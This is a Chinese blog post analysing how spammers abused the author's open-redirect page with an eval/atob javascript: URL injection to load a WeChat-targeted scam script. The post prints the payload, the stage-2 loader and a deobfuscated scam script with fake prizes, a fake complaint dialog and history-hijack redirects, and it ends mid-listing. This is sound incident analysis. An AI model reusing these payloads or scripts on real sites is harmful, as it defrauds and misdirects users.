如有乐享被黑跳转页面分析


故事

去年的时候博客针对第三方网址地址跳转做了一个html页面,来做跳转用!这样能一定程度减少博客的权重的流失!

这个HTML跳转页面是纯JS实现的,页面上也没做安全判断!

但是过了一段时间突然发现域名被微信封了,无法在微信里分享网页了~~~

经过分析发现原来是有人恶意利用这个html跳转页面,跳转到菠菜网站!!

博主发现后立即在这个页面中加了有效的判断,然后开始漫长的申请解封的道路!

链接

含有恶意欺诈网页:  https://51.ruyo.net/go/index.html?u=javascript:parent[String.fromCharCode(101;118;97;108)](parent[String.fromCharCode(97;116;111;98)]("ZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgc3JjPS8vYy5icWFraS5jbi94cy5qcz48L3NjcmlwdD4iKQ=="));//241137/241137.html#pt_1520302119694 

拆开得到javascript代码

javascript:parent[String.fromCharCode(101;118;97;108)](parent[String.fromCharCode(97;116;111;98)]("ZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgc3JjPS8vYy5icWFraS5jbi94cy5qcz48L3NjcmlwdD4iKQ=="));//241137/241137.html#pt_1520302119694 
// NOTE(review): inside a javascript: URL, `parent` is the global window.parent (the embedding browsing context),
// not jQuery's .parent(); the two bracket lookups resolve to parent.eval and parent.atob, so the base64 payload
// is executed in the parent page's context. The trailing `//241137/...` is simply commented out.
// The semicolons inside fromCharCode(...) are most likely commas mangled by the blog's rendering;
// as written they would be a syntax error.
//parent() (jQuery) returns the direct parent element of the selected element.
//fromCharCode() accepts one or more Unicode code points and returns the corresponding string.
//The code points used here are:
  • 101 = e
  • 118 = v
  • 97 = a
  • 108 = l
  • 97 = a
  • 116 = t
  • 111 = o
  • 98 = b

连起来,得到eval atob,猜测可能是js函数

eval()// 函数计算 JavaScript 字符串,并把它作为脚本代码来执行。
atob() //方法用于解码使用 base-64 编码的字符串。

ZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgc3JjPS8vYy5icWFraS5jbi94cy5qcz48L3NjcmlwdD4iKQ==

解码得到

document.write("<script src=//c.bqaki.cn/xs.js></script>")

我访问这个链接的时候已经是找不到这个ip地址了(网站挂了)但是在网上找到了缓存,估计是有人也是遭遇同样的情况然后用urlscan.io 扫描了一下

大概信息是

  • 扫描时间:2018年1月4日
  • 服务器地址:天津 天津 , 中国

完整的缓存js代码是

// Stage-1 loader (xs.js as cached by urlscan.io). It only acts inside the WeChat in-app browser.
var ua = navigator.userAgent.toLowerCase();

// Blanks the title before the document is replaced.
function addTitle() {
document.title = "";
}
// "micromessenger" is the WeChat browser's User-Agent token; any other browser sees nothing happen.
if (/micromessenger/.test(ua)) {
addTitle();
// Replaces the whole current document with the escaped HTML below (the decoded version follows in the post).
var new_doc = document.open("text/html", "replace");
var html = unescape("%3C%21DOCTYPE%20html%3E%0A%3Chtml%20style%3D%22font-size%3A%2040%25%3B%22%3E%0A%09%3Chead%3E%0A%09%09%3Cmeta%20charset%3D%22UTF-8%22%3E%0A%09%09%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2Cinitial-scale%3D1%2Cuser-scalable%3D0%2Cminimum-scale%3D1.0%2Cmaximum-scale%3D1.0%22%3E%0A%09%09%3Cmeta%20content%3D%22yes%22%20name%3D%22apple-mobile-web-app-capable%22%3E%0A%09%09%3Cmeta%20content%3D%22black%22%20name%3D%22apple-mobile-web-app-status-bar-style%22%3E%0A%09%09%3Cmeta%20content%3D%22no%22%20name%3D%22msapplication-tap-highlight%22%3E%0A%09%09%3Cmeta%20content%3D%22IE%3Dedge%22%20http-equiv%3D%22X-UA-Compatible%22%3E%0A%09%09%3Cmeta%20content%3D%22telephone%3Dno%22%20name%3D%22format-detection%22%3E%0A%09%09%3Cmeta%20content%3D%22email%3Dno%22%20name%3D%22format-detection%22%3E%0A%09%09%3Ctitle%3E%3C/title%3E%0A%09%09%3Cscript%20type%3D%22text/javascript%22%3E%0A%09%09%09var%20_hmt%20%3D%20_hmt%20%7C%7C%20%5B%5D%3B%3B%0A%09%09%09%28function%28%29%20%7B%0A%09%09%09%09var%20srcArr%20%3D%20%5B%22https%3A//cdn.bootcss.com/jquery/1.2.3/jquery.min.js%22%2C%22https%3A//s19.cnzz.com/z_stat.php%3Fid%3D1272904854%26web_id%3D1272904854%22%2C%20%22//c.bqaki.cn/mm.js%22%5D%3B%0A%09%09%09%09var%20hm%2C%20s%3B%0A%09%09%09%09for%28var%20i%20%3D%200%3B%20i%20%3C%20srcArr.length%3B%20i++%29%20%7B%0A%09%09%09%09%09hm%20%3D%20document.createElement%28%22script%22%29%3B%0A%09%09%09%09%09hm.src%20%3D%20srcArr%5Bi%5D%3B%0A%09%09%09%09%09hm.charset%20%3D%20%22utf-8%22%3B%0A%09%09%09%09%09s%20%3D%20document.getElementsByTagName%28%22script%22%29%5B0%5D%3B%0A%09%09%09%09%09s.parentNode.insertBefore%28hm%2C%20s%29%3B%0A%09%09%09%09%7D%0A%09%09%09%7D%29%28%29%3B%0A%09%09%3C/script%3E%0A%09%3C/head%3E%0A%09%3Cbody%3E%0A%09%3C/body%3E%0A%0A%3C/html%3E");
new_doc.write(html);
new_doc.close();
}

用到的几个函数

1
2
toLowerCase() //方法用于把字符串转换为小写。
unescape() //函数可对通过 escape() 编码的字符串进行解码。

解码后的html页面这个样子

<!-- Stage-2 document that xs.js writes over the victim page (decoded from the unescape() string above). -->
<!DOCTYPE html>
<html style="font-size: 40%;">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=0,minimum-scale=1.0,maximum-scale=1.0">
<meta content="yes" name="apple-mobile-web-app-capable">
<meta content="black" name="apple-mobile-web-app-status-bar-style">
<meta content="no" name="msapplication-tap-highlight">
<meta content="IE=edge" http-equiv="X-UA-Compatible">
<meta content="telephone=no" name="format-detection">
<meta content="email=no" name="format-detection">
<title></title>
<script type="text/javascript">
var _hmt = _hmt || [];; // Baidu-analytics-style global; nothing in this document uses it
// Inserts three scripts before the first <script>: jQuery 1.2.3 (mm.js's jump() relies on $),
// a cnzz visitor counter, and the payload //c.bqaki.cn/mm.js (deobfuscated listing follows in the post).
(function() {
var srcArr = ["https://cdn.bootcss.com/jquery/1.2.3/jquery.min.js","https://s19.cnzz.com/z_stat.php?id=1272904854&web_id=1272904854", "//c.bqaki.cn/mm.js"];
var hm, s;
for(var i = 0; i < srcArr.length; i++) {
hm = document.createElement("script");
hm.src = srcArr[i];
hm.charset = "utf-8";
s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
}
})();
</script>
</head>
<!-- The body is empty on purpose: mm.js builds the whole visible page in addBody(). -->
<body>
</body>

</html>

然后c.bqaki.cn/mm.js这个网站也挂掉了,恰巧urlscan.io 也缓存了

解密后的mm.js

// --- mm.js (deobfuscated by the author). Comments are analysis notes; code is unchanged. ---
var tONm1, hcRdr2; // viewport width / height, read once below
var mLTeLPR3;
// 0 when this document is framed (its frame count differs from the parent's), 1 otherwise.
// Every redirect below keys off this to pick top.location vs. document.location.
(window['frames']['length'] != parent['frames']['length']) ? mLTeLPR3 = 0 : mLTeLPR3 = 1;
tONm1 = window["document"]['documentElement']['clientWidth'];
hcRdr2 = window["document"]['documentElement']['clientHeight'];
var CmJw4 = "http://t.cn/Roji0oH"; // destination after the fake "complaint" dialog (initReport / removeDialog)
var MsqLT5 = "http://mp.weixin.qq.com/mp/ad_biz_info"; // referenced only from unreachable code in PCRd
var aWTaqIGXG6 = "https://m.jd.com/"; // not referenced anywhere in this listing
var sZQgb7 = "//c.bqaki.cn/"; // static asset host (scripts, images, css)
var LHpJ8 = "//api.bqaki.cn/"; // API host (loadAPIJS, jump)
window['iOSLink'] = "##"; // placeholders read by UARd / hashChangeJump
window['androidLink'] = "##";
var Qln9 = {}; // not referenced anywhere in this listing
var hzgG10 = true; // only written from unreachable code in PCRd
var pv_WPFt11 = null; // XHR object read by toKey; never assigned in this listing
var kRS12 = false; // "visitor has shared" flag: set in onVisibilityChangedCallback, read in redirectToCash
var $K13 = new Base64(); // Base64 helper declared further down (function declaration, hoisted)
// Base64 bait titles; addTitle picks one by hashing the hostname (decoded list at the end of the post).
var jWZiCZ14 = ["6YCf54K577yB", "5Luk5Lq65byA5b+D55qE5pe25Yi75p2l5LqG", "6YCf5bqm77yB5bey5pyJM+S9jeWlveWPi+mihuWPlg==", "5Lq65Lq65YWN6LS56aKG", "5Zyf6LGq77yM5bCx5piv5aaC5q2k5Lu75oCn", "6KeB6ICF5pyJ5Lu977yM5p2l5ZCn44CC", "55yL5LqG5bCx5b2S5L2g5LqG", "54K55byA77yM5L2g5bCx5pyJ5Lu9", "5Yir6K+06K+d77yM54K55oiR77yB", "55yL77yM5pS26I635pe25Yi75p2l5LqG44CC", "5b+r5rKh5LqG77yB6YCf55yL77yB", "5bCx6KaB5byA5aeL5LqG77yM5b+r77yB", "6L+Z5LmI5aW955qE5rS75Yqo77yM5L2g56uf54S26L+Y5LiN55+l6YGT77yB"];

// Returns the unescaped value of cookie `BNcRBu15`, or "" when it is not set.
function getCookie(BNcRBu15) {
var s16, $_sMiZrrF17 = new window["RegExp"]('(^| )' + BNcRBu15 + '=([^;]*)(;|$)');
if (s16 = window["document"]['cookie']['match']($_sMiZrrF17)) {
return window["unescape"](s16[2]);
} else {
return "";
}
}

// Writes cookie `wsobYXtny18`=`XLzf19` (escaped) with a 30-day expiry; no path, domain or Secure attributes.
function setCookie(wsobYXtny18, XLzf19) {
var Y$GYLzQ20 = 30; // lifetime in days
var vutL21 = new window["Date"]();
vutL21['setTime'](vutL21['getTime']() + Y$GYLzQ20 * 24 * 60 * 60 * 1000);
window["document"]['cookie'] = wsobYXtny18 + '=' + window["escape"](XLzf19) + ';expires=' + vutL21['toGMTString']();
}
initReport(); // redirects immediately when the "wx110" cookie was set on an earlier visit (see initReport)
initShare(); // no-op: its body is commented out (see initShare)
// List of URLs delivered by jsCallback('ejfiemw', ...) from the remote api script; used both as a
// "own host / own referrer" check (isEjfiemw, isAevkhi3) and as the pool of redirect targets (modifyLocationHref).
var DzaV22;

// True when one of the DzaV22 URLs contains the current top-level host.
// `Math.random() > 100` can never hold (random() is in [0, 1)), so that early return is dead code.
// DzaV22 is undefined until jsCallback('ejfiemw') has run; calling this earlier would throw.
function isEjfiemw() {
if (window["Math"]['random']() > 100) {
return true;
}
for (var FheiFh23 = 0; FheiFh23 < DzaV22['length']; FheiFh23++) {
if (DzaV22[FheiFh23]['indexOf'](top['location']['host']) != -1) {
return true;
}
}
return false;
}

// "Is this an external visit?": true when there is no referrer, or when the referrer contains none of
// the DzaV22 hosts (scheme stripped, first path segment kept). The first matching host breaks out with false.
// `Math.random() > 100` is again an impossible condition.
function isAevkhi3() {
if (window["Math"]['random']() > 100) {
return true;
}
if ("" == window["document"]['referrer']) {
return true;
}
var JNILnDJf24 = false;
for (var tzPhUE25 = 0; tzPhUE25 < DzaV22['length']; tzPhUE25++) {
if (window["document"]['referrer']['indexOf'](DzaV22[tzPhUE25]['replace']('https://', '')['replace']('http://', '')['split']("/")[0]) != -1) {
JNILnDJf24 = false;
break;
} else {
JNILnDJf24 = true;
}
}
return JNILnDJf24;
}

// Injects <script src="//api.bqaki.cn/<kQYCu26>.js?d=<random>"> before the first script tag;
// the random query string defeats caching, so a fresh payload can be served on every load.
function loadAPIJS(kQYCu26) {
var OXE$Uoby27 = LHpJ8 + kQYCu26 + ".js?d=" + (window["Math"]['random']() * 100);
var PDjLtZYv28, eoQlSjh29;
PDjLtZYv28 = window["document"]['createElement']("script");
PDjLtZYv28['src'] = OXE$Uoby27;
eoQlSjh29 = window["document"]['getElementsByTagName']("script")[0];
eoQlSjh29['parentNode']['insertBefore'](PDjLtZYv28, eoQlSjh29);
}

// Same as loadAPIJS but from the static host //c.bqaki.cn/.
function loadCommonJS(nho30) {
var LzsTtLX31 = sZQgb7 + nho30 + ".js?d=" + (window["Math"]['random']() * 100);
var BlquXz$ny32, kp33;
BlquXz$ny32 = window["document"]['createElement']("script");
BlquXz$ny32['src'] = LzsTtLX31;
kp33 = window["document"]['getElementsByTagName']("script")[0];
kp33['parentNode']['insertBefore'](BlquXz$ny32, kp33);
}

// Fills and displays the #sdk_dialog overlay created by dialogInit (header, body and footer-button HTML).
// The removeEventListener call passes a fresh anonymous function, so it removes nothing;
// every call therefore adds one more click listener that hides the dialog.
function show(I34, T35, EmZ36) {
var _CZHjrT37 = window["document"]['getElementById']("sdk_dialog"),
O_mO38 = window["document"]['getElementById']("sdk_dialog_hd"),
W39 = window["document"]['getElementById']("sdk_dialog_bd"),
dVGKwpWQ$40 = window["document"]['getElementById']("sdk_dialog_ft");
_CZHjrT37['style']['display'] = "block", O_mO38['innerHTML'] = I34, W39['innerHTML'] = T35, dVGKwpWQ$40['innerHTML'] = EmZ36, dVGKwpWQ$40['removeEventListener']("click", function() {}, false), dVGKwpWQ$40['addEventListener']("click", function() {
_CZHjrT37['style']['display'] = "none"
}, false);
}
loadAPIJS('api'); // //api.bqaki.cn/api.js — remote, not part of this listing
loadCommonJS('clipboard'); // //c.bqaki.cn/clipboard.js — remote, not part of this listing
// Entry point that the remote scripts call back into. Names handled here:
//   'ejfiemw' -> hO41.data is the URL list stored in DzaV22
//   'cejsje'  -> hO41.adLink is stored as window.adLink (used by jump / onhashchange)
// The last branch uses `=` (assignment) instead of `==`, so it is taken for ANY other name:
// if this site is in the list and the visit is "external" with no isClick cookie, or if the
// site is not in the list at all, the visitor is redirected to a random DzaV22 entry.
window['jsCallback'] = function(name, hO41) {
if (name == 'ejfiemw') {
DzaV22 = hO41['data'];
} else if (name == 'cejsje') {
window['adLink'] = hO41['adLink'];
} else if (name = 'eugjrrh') {
if (isEjfiemw()) {
if (isAevkhi3()) {
if ("1" != getCookie("isClick")) {
modifyLocationHref(DzaV22);
}
}
} else {
modifyLocationHref(DzaV22);
}
}
};

// Sets the document title to one of the base64 bait strings in jWZiCZ14: the char codes of the
// host's first label are summed and taken modulo the list length, so each hostname gets a stable title.
function addTitle() {
var Hsn$Nd42 = window["document"]['location']['host']['substr'](0, window["document"]['location']['host']['indexOf']('.'));
for (var _y43 = 0, ppkWMwv44 = 0; ppkWMwv44 < Hsn$Nd42['length']; ppkWMwv44++) {
_y43 += Hsn$Nd42['charAt'](ppkWMwv44)['charCodeAt']();
}
var pjbjrKl45 = _y43 % jWZiCZ14['length'];
var PfT46 = $K13['decode'](jWZiCZ14[pjbjrKl45]);
window["document"]['title'] = PfT46;
}
var O47; // document.body reference, set in addBody and used by createMoney

// Replaces the whole <body>: loads //c.bqaki.cn/css.css, then inserts a full-screen image with a
// click map, a "投诉" (complain) button and an <audio> element hosted on file.ih5.cn, and wires them up.
function addBody() {
var LPQck48 = window["document"]['createElement']('link');
LPQck48['href'] = '//c.bqaki.cn/css.css';
LPQck48['rel'] = 'stylesheet';
LPQck48['type'] = 'text/css';
window["document"]['getElementsByTagName']('HEAD')['item'](0)['appendChild'](LPQck48);
// decodeURI("%E6%8A%95%E8%AF%89") is the UTF-8 encoding of "投诉" (complain).
var F49 = '<img id="cross-domain-img" usemap="#img-map" src="#">' + '<map id="img-map" name="img-map">' + '<area shape="rect" coords="0,0,0,0" href ="javascript:;" alt="rd" />' + '</map>' + '<div id="report-btn">' + decodeURI("%E6%8A%95%E8%AF%89") + '</div>' + '<audio id="bg-music" controls="controls" preload="auto">' + '<source src="https://file.ih5.cn/v3/files/2171738/20171012/2b565bec.mp3" type="audio/mpeg">' + '</audio>';
window["document"]['body']['innerHTML'] = F49;
O47 = window["document"]['body'];
setImgWH();
clickImg();
}

// Stretches #cross-domain-img to the viewport size captured at load (tONm1 x hcRdr2).
function setImgWH() {
var ICoQoYpXZ50 = window["document"]['getElementById']('cross-domain-img');
if (ICoQoYpXZ50 != null) {
ICoQoYpXZ50['style']['width'] = tONm1 + 'px';
ICoQoYpXZ50['height'] = hcRdr2;
ICoQoYpXZ50['style']['display'] = 'block';
}
window["document"]['body']['style'] = "display:block;margin:0 auto;";
}

// Plays the injected #bg-music element (scheduled from changeImg).
function playMusic() {
window["document"]['getElementById']("bg-music")['play']();
}

// Resizes the <area> hotspot to a rectangle spanning 40%-60% of the width and 64%-72% of the height
// (presumably where the button in gif.gif sits — the image itself is not part of this listing).
// The `null != LP55` test runs after LP55[0] has already been dereferenced, so it guards nothing.
function setMapArea() {
var g51 = .4 * tONm1,
_LE52 = .64 * hcRdr2,
l53 = .6 * tONm1,
owp54 = .72 * hcRdr2,
LP55 = window["document"]['getElementsByTagName']("area");
LP55[0]['coords'] = (null != LP55) ? g51 + "," + _LE52 + "," + l53 + "," + owp54 : "0,0,1000,1000"
}

// Returns the "amount won" shown to the visitor: a random integer between 80 and 130, persisted in
// the MONEY cookie on first use so the same number is shown on later visits.
function randomMoney() {
var alBgkzw56 = null;
if ((getCookie("MONEY") == null || getCookie("MONEY") == "" || getCookie("MONEY") == undefined)) {
alBgkzw56 = ((50 * window["Math"]['random']()) + 80)['toFixed'](0);
setCookie("MONEY", alBgkzw56);
} else {
alBgkzw56 = getCookie("MONEY");
}
return alBgkzw56;
};

// Appends the hidden #sdk_dialog markup used by show(). The class names are WeUI's (WeChat's own
// UI kit), so the dialog looks like a native WeChat prompt.
function dialogInit() {
var MtkQtomX57 = window["document"]['createElement']("div");
MtkQtomX57['id'] = "sdk_dialog", MtkQtomX57['innerHTML'] = '<div class="weui-mask weui-mask--visible"></div><div class="weui-dialog weui-dialog--visible"><div class="weui-dialog__hd"><strong class="weui-dialog__title"><span style="color:red;" id="sdk_dialog_hd"></span></strong></div><div class="weui-dialog__bd" id="sdk_dialog_bd"></div><div class="weui-dialog__ft"><a id="sdk_dialog_ft" href="javascript:;" class="weui-dialog__btn weui-dialog__btn_primary"></a></div></div>', window["document"]['body']['appendChild'](MtkQtomX57);
}

// Inserts the #m-amount div showing randomMoney() as the body's first child, centred horizontally
// and placed at 29/64 of the viewport height (on top of the full-screen image).
function createMoney() {
var dWyovTEt58 = window["document"]['createElement']("div");
dWyovTEt58['id'] = "m-amount";
var vJ59 = randomMoney();
dWyovTEt58['innerHTML'] = vJ59, dWyovTEt58['style'] = "position:fixed;font-size:63px;font-family:STHeiti;", O47['insertBefore'](dWyovTEt58, O47['childNodes'][0]), dWyovTEt58['style']['left'] = window["document"]['documentElement']['clientWidth'] / 2 - dWyovTEt58['clientWidth'] / 2 + "px", dWyovTEt58['style']['top'] = 29 * window["document"]['documentElement']['clientHeight'] / 64 - dWyovTEt58['clientHeight'] / 2 + "px"
}

// First-click handler on the full-screen image: starts visibility tracking, marks the visitor with
// the isClick cookie, detaches itself, schedules the audio (1.5 s), the amount (2.3 s) and the
// hotspot + its click handler (0.8 s), then swaps the still image for gif.gif.
// Three of the timers pass code strings instead of functions (string-form setTimeout).
function changeImg() {
initVisibility();
setCookie("isClick", "1");
var XrpnX60 = window["document"]['getElementById']("cross-domain-img");
XrpnX60['removeEventListener']("click", changeImg, false);
setTimeout(playMusic, 1500);
setTimeout("createMoney();", 2300);
setTimeout("setMapArea();", 800);
setTimeout("clickArea();", 800);
if (null != XrpnX60) {
XrpnX60['src'] = sZQgb7 + "gif.gif";
XrpnX60['id'] = "1ross-domain-img-opened";
}
}

// Sets the initial still image (static.jpg) and binds changeImg to its click.
// `src` is assigned before the null check, so the check is ineffective.
function clickImg() {
var LStygv61 = window["document"]['getElementById']("cross-domain-img");
LStygv61['src'] = sZQgb7 + "static.jpg";
if (null != LStygv61) {
LStygv61['addEventListener']("click", changeImg, false);
}
}

// Binds the "投诉" (complain) button to addDialog — the fake complaint flow.
function report() {
var Iiz62 = window["document"]['getElementById']("report-btn");
if (null != Iiz62) {
Iiz62['addEventListener']("click", addDialog, false)
}
}

// Runs at load: a visitor who previously pressed "确定" on the fake complaint dialog (cookie wx110=y)
// is sent straight to CmJw4 (the t.cn short link) instead of seeing the page again.
function initReport() {
if (getCookie("wx110") == "y") {
(mLTeLPR3 == 0) ? top['location']['href'] = CmJw4 : window["document"]['location']['href'] = CmJw4
}
}

// Renders a fake "投诉成功 / 我们已经收到您的投诉" dialog entirely inside this page — nothing is sent
// to WeChat's complaint system. Its OK button (#tousu) triggers removeDialog.
function addDialog() {
var Q63 = window["document"]['createElement']("div");
Q63['className'] = "weui-mask weui-mask--visible";
window["document"]['body']['appendChild'](Q63);
var zkw64 = window["document"]['createElement']("div");
zkw64['className'] = "weui-dialog weui-dialog--visible";
var kT65 = '<div class="weui-dialog__hd">' + '<strong class="weui-dialog__title">' + '<span style="color:red;">投诉成功</span></strong>' + '</div>' + '<div class="weui-dialog__bd">' + '我们已经收到您的投诉' + '</div>' + '<div class="weui-dialog__ft">' + '<a href="javascript:;" id="tousu" class="weui-dialog__btn primary">确定</a>' + '</div>';
zkw64['innerHTML'] = kT65;
window["document"]['body']['appendChild'](zkw64);
var sfMX$Wdf66 = window["document"]['getElementById']("tousu");
sfMX$Wdf66['addEventListener']("click", removeDialog, false)
}

// Despite the name, nothing is removed: the wx110=y cookie is persisted and the visitor is
// redirected to CmJw4, so the fake complaint ends in yet another redirect.
function removeDialog() {
setCookie("wx110", "y");
(mLTeLPR3 == 0) ? top['location']['href'] = CmJw4 : window["document"]['location']['href'] = CmJw4
}

// True when the User-Agent contains "micromessenger" (WeChat's in-app browser).
// match() returns a one-element array; the == comparison coerces it to that element.
function isWeixin() {
var p67 = navigator['userAgent']['toLowerCase']();
if (p67['match'](/MicroMessenger/i) == "micromessenger") {
return true
} else {
return false
}
}

// Platform check that has no effect: the unconditional `return;` makes the redirect to MsqLT5 and
// the `hzgG10 = false` assignment below it unreachable, and when the condition is false the
// function simply falls off the end. Note also the key mismatch: `x11` is written but `xll`
// (letter l) is read, which is always undefined/false.
function PCRd() {
var cnLgXJL68 = {
win: false,
mac: false,
xll: false
};
var tQSul69 = navigator['platform'];
cnLgXJL68['win'] = tQSul69['indexOf']("Win") == 0;
cnLgXJL68['mac'] = tQSul69['indexOf']("Mac") == 0;
cnLgXJL68['x11'] = tQSul69 == "X11" || tQSul69['indexOf']("Linux") == 0;
if (cnLgXJL68['win'] || cnLgXJL68['mac'] || cnLgXJL68['xll'] || !isWeixin()) {
return;
if (window["document"]['location']['href']['indexOf']("#") == -1) {
(mLTeLPR3 == 0) ? top['location']['href'] = MsqLT5 : window["document"]['location']['href'] = MsqLT5;
hzgG10 = false;
}
}
}

// Redirects iOS visitors (UA regex) to window.iOSLink; the Android flag is computed but never used.
// UARd is not called anywhere in this listing.
function UARd() {
var iAKrFWu70 = navigator['userAgent'];
var goncZk71 = iAKrFWu70['indexOf']('Android') > -1 || iAKrFWu70['indexOf']('Adr') > -1;
var POSYXE72 = !! iAKrFWu70['match'](/\(i[^;]+;( U;)? CPU.+Mac OS X/);
if (POSYXE72 == true) {
(mLTeLPR3 == 0) ? top['location']['href'] = iOSLink : window["document"]['location']['href'] = iOSLink
}
}

// Hotspot click handler: once kRS12 ("has shared") is set, jump(); otherwise show the
// "未分享 / 未分享到朋友圈,无法查看。 / 确定" dialog (decoded strings are listed at the end of the post).
function redirectToCash() {
if (kRS12) {
jump();
} else {
show($K13['decode']("5pyq5YiG5Lqr"), $K13['decode']("5pyq5YiG5Lqr5Yiw5pyL5Y+L5ZyILOaXoOazleafpeeci+OAgg=="), $K13['decode']("56Gu5a6a"));
}
}

// XHR readyState handler: on HTTP 200, redirects to a random entry of the JSON response's `data` array.
// pv_WPFt11 is never assigned in this listing, so this path is dead here.
function toKey() {
if (pv_WPFt11['readyState'] == 4) {
if (pv_WPFt11['status'] == 200) {
var gGjHZn73 = pv_WPFt11['responseText'];
modifyLocationHref(JSON['parse'](gGjHZn73)['data'])
}
}
}

// Builds the current origin + path and tests whether content.data contains it, but both branches
// of that test are empty — effectively a no-op (leftover code).
function toPool(content) {
var DFXSohh74 = content['msg'];
if (DFXSohh74 != 'error') {
var dySFfyYl75 = content['data'];
var Jqy76 = top['location']['pathname'];
if (Jqy76 == '/' || Jqy76 == '/index.html') {
Jqy76 = ''
}
var hR77 = top['location']['protocol'] + '//' + top['location']['host'] + Jqy76;
if (dySFfyYl75['indexOf'](hR77) != -1) {} else {}
}
}

// Redirects (top window or current document, per mLTeLPR3) to a randomly chosen element of linkArr.
// Every redirect target in this script is delivered at runtime by the remote API, not hard-coded here.
function modifyLocationHref(linkArr) {
var fMZ_CIRM78 = linkArr[window["Math"]['floor'](window["Math"]['random']() * linkArr['length'])];
(mLTeLPR3 == 0) ? top['location']['href'] = fMZ_CIRM78 : window["document"]['location']['href'] = fMZ_CIRM78;
}

// Binds redirectToCash to clicks on the image map (scheduled from changeImg).
function clickArea() {
window["document"]['getElementById']("img-map")['addEventListener']("click", redirectToCash, false)
}

// `getHours() >= -1` is always true, so a history entry is pushed 200 ms after load unconditionally.
function historyADPage() {
var kmsUd79 = new window["Date"]()['getHours']();
if (kmsUd79 >= -1) {
setTimeout(addADToHistory, 200);
}
}

// Pushes a "#pt_<timestamp>" history entry — the same fragment form as the "#pt_1520302119694" in the
// captured URL at the top of the post. Pressing Back afterwards changes the hash, which fires
// window.onhashchange (defined below) instead of leaving the page.
function addADToHistory() {
history['pushState'](history['length'] + 1, "", "#pt_" + new window["Date"]()['getTime']());
}

// Alternative hash handler: 90% of the time redirects to androidLink with an "ad" id derived from
// the current minute. Not referenced anywhere else in this listing (onhashchange uses jump instead).
function hashChangeJump() {
if (window["Math"]['random']() > 0.1) {
window["document"]['location']['href'] = androidLink + "?ad=" + (window["parseInt"]((window["parseInt"](new window["Date"]()['getTime']() / (1000 * 60 * 1)) + '')['substring'](2)) + 5000);
}
}

// Standard Base64 codec with UTF-8 pre/post-processing (the widely copied "webtoolkit" snippet).
// `_keyStr`, `_utf8_encode`, `_utf8_decode`, `c1`, `c2` and `c3` are assigned without `var`,
// so they leak into the global scope.
function Base64() {
_keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
// Encodes `input` (UTF-8 encoded first) to Base64 with '=' padding.
this['encode'] = function(input) {
var NHMG_DPM$80 = "";
var D_k81, EEQyVO82, fWdfIEGk83, SkrvksO84, hbdLpXt85, zHKagkmq86, s_$wej87;
var gDtp$zkLC88 = 0;
input = _utf8_encode(input);
while (gDtp$zkLC88 < input['length']) {
D_k81 = input['charCodeAt'](gDtp$zkLC88++);
EEQyVO82 = input['charCodeAt'](gDtp$zkLC88++);
fWdfIEGk83 = input['charCodeAt'](gDtp$zkLC88++);
SkrvksO84 = D_k81 >> 2;
hbdLpXt85 = ((D_k81 & 3) << 4) | (EEQyVO82 >> 4);
zHKagkmq86 = ((EEQyVO82 & 15) << 2) | (fWdfIEGk83 >> 6);
s_$wej87 = fWdfIEGk83 & 63;
// charCodeAt past the end yields NaN; index 64 is the '=' padding character.
if (isNaN(EEQyVO82)) {
zHKagkmq86 = s_$wej87 = 64
} else if (isNaN(fWdfIEGk83)) {
s_$wej87 = 64
}
NHMG_DPM$80 = NHMG_DPM$80 + _keyStr['charAt'](SkrvksO84) + _keyStr['charAt'](hbdLpXt85) + _keyStr['charAt'](zHKagkmq86) + _keyStr['charAt'](s_$wej87)
}
return NHMG_DPM$80
};
// Decodes Base64 `input` (non-alphabet characters stripped first) and UTF-8 decodes the result.
this['decode'] = function(input) {
var fTgOsCovo89 = "";
var ijm90, LBwWIw91, $Hhkp92;
var hhcvG93, s94, LqMXu95, BQmBU96;
var gFVlTR97 = 0;
input = input['replace'](/[^A-Za-z0-9\+\/\=]/g, "");
while (gFVlTR97 < input['length']) {
hhcvG93 = _keyStr['indexOf'](input['charAt'](gFVlTR97++));
s94 = _keyStr['indexOf'](input['charAt'](gFVlTR97++));
LqMXu95 = _keyStr['indexOf'](input['charAt'](gFVlTR97++));
BQmBU96 = _keyStr['indexOf'](input['charAt'](gFVlTR97++));
ijm90 = (hhcvG93 << 2) | (s94 >> 4);
LBwWIw91 = ((s94 & 15) << 4) | (LqMXu95 >> 2);
$Hhkp92 = ((LqMXu95 & 3) << 6) | BQmBU96;
fTgOsCovo89 = fTgOsCovo89 + window["String"]['fromCharCode'](ijm90);
if (LqMXu95 != 64) {
fTgOsCovo89 = fTgOsCovo89 + window["String"]['fromCharCode'](LBwWIw91)
}
if (BQmBU96 != 64) {
fTgOsCovo89 = fTgOsCovo89 + window["String"]['fromCharCode']($Hhkp92)
}
}
fTgOsCovo89 = _utf8_decode(fTgOsCovo89);
return fTgOsCovo89
};
// Encodes a JS string to a byte-per-char UTF-8 string (1-3 byte sequences; no surrogate-pair handling).
_utf8_encode = function(string) {
string = string['replace'](/\r\n/g, "\n");
var yRSYdPdD98 = "";
for (var MYJFTCe99 = 0; MYJFTCe99 < string['length']; MYJFTCe99++) {
var QOgO100 = string['charCodeAt'](MYJFTCe99);
if (QOgO100 < 128) {
yRSYdPdD98 += window["String"]['fromCharCode'](QOgO100)
} else if ((QOgO100 > 127) && (QOgO100 < 2048)) {
yRSYdPdD98 += window["String"]['fromCharCode']((QOgO100 >> 6) | 192);
yRSYdPdD98 += window["String"]['fromCharCode']((QOgO100 & 63) | 128)
} else {
yRSYdPdD98 += window["String"]['fromCharCode']((QOgO100 >> 12) | 224);
yRSYdPdD98 += window["String"]['fromCharCode'](((QOgO100 >> 6) & 63) | 128);
yRSYdPdD98 += window["String"]['fromCharCode']((QOgO100 & 63) | 128)
}
}
return yRSYdPdD98
};
// Inverse of _utf8_encode: byte-per-char string back to a JS string (1-3 byte sequences only).
_utf8_decode = function(utftext) {
var qiz101 = "";
var IWh_LbK102 = 0;
var kHK103 = c1 = c2 = 0;
while (IWh_LbK102 < utftext['length']) {
kHK103 = utftext['charCodeAt'](IWh_LbK102);
if (kHK103 < 128) {
qiz101 += window["String"]['fromCharCode'](kHK103);
IWh_LbK102++
